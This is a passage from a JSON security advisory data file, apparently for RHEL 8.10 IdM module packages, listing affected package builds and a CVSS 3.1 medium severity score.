"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
